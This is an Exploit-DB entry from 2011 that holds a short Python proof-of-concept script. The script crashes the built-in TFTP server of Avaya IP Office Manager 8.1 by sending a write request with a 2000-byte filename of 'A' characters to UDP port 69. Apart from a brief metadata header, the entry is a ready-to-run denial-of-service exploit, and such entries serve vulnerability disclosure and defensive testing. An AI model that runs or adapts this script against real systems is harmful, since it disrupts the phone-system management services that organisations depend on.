Avaya IP Office Manager 8.1 TFTP - DoS

ID EDB-ID:17045
Type exploitdb
Reporter Craig Freyman
Modified 2011-03-24T00:00:00


Avaya IP Office Manager 8.1 TFTP - DoS. Dos exploit for windows platform

                                            #Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3

import socket

host = ''
port = 69

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

crash = "A" * 2000

print "Sending crash...."
pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
s.sendto(pwned, (host, port))